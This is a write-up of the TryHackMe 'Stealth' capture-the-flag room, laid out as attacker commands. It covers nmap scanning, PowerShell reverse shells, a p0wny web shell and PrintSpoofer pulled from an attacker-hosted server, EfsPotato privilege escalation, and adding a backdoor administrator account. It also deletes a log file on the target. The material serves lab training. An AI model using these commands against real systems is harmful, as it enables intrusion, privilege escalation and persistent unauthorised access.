Stealth

Room Link: https://tryhackme.com/r/room/stealth

Scans

Initial scan

Kali

nmap -A $VICTIM

Longer scan

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/8000 - HTTPS

Kali

TCP/8080 - HTTPS

Initial Shell

Kali

rlwrap nc -lvnp 4444

Shell #1 attempt

This shell didn't work

Kali

git clone https://github.com/samratashok/nishang.git
cd nishang/Shells/
subl Invoke-PowerShellTcp.ps1

Kali(subl)

Invoke-PowerShellTcp -Reverse -IPAddress $KALI -Port 4444

Shell #2 attempt

This shell worked

Kali

git clone https://github.com/martinsohn/PowerShell-reverse-shell.git
cd PowerShell-reverse-shell/
subl powershell-reverse-shell.ps1

Change this line to Kali IP

Kali(subl)

Net.Sockets.TCPClient('$KALI', 4444)

Victim

cd C:\Users\evader\Desktop
dir
type encodedflag

Kali

echo WW91IGNhbiBnZXQgdGhlIGZsYWcgYnkgdmlzaXRpbmcgdGhlIGxpbmsgaHR0cDovLzxJUF9PRl9USElTX1BDPjo4MDAwL2FzZGFzZGFkYXNkamFramRuc2Rmc2Rmcy5waHA= | base64 --decode

Victim

cd C:\xampp\htdocs\uploads
del log.txt

refresh the page and we can see the flag now.

Lateral Movement

Going by privs we don't have much but since we have web I tried adding a new shell and seeing if we get anything from it.

Victim

whoami /priv

Kali

git clone https://github.com/flozz/p0wny-shell.git
cd p0wny-shell/ 
python2 -m SimpleHTTPServer 82

Victim

cd C:\xampp\htdocs
iwr -uri "http://$KALI:82/shell.php" -o shell.php

Even though we're the same user this shell has SeImpersonatePrivilege enabled

Privilege Escalation

I tried printspoofer but I couldn't execute the exe.

Attempt #1

Kali

git clone https://github.com/dievus/printspoofer
cd printspoofer/
python2 -m SimpleHTTPServer 82

Victim

cd C:\Users\evader\Desktop
iwr -uri "http://$KALI:82/PrintSpoofer.exe" -o PrintSpoofer.exe
PrintSpoofer.exe -i -c whoami

Attempt #2

We can see a EFI folder so looks like a clue on what to do.

Victim

cd C:\
dir

Kali

git clone https://github.com/zcgonvh/EfsPotato.git
cd EfsPotato/
python2 -m SimpleHTTPServer 82

Victim

iwr -uri "http://10.10.252.180:82/EfsPotato.cs" -o efs.cs

Victim(p0wny-shell)

C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe efs.cs -nowarn:1691,618
efs.exe "cmd.exe /c net user user password@123 /add && net localgroup administrators user /add"

Kali

remmina
Username: user
Password: password@123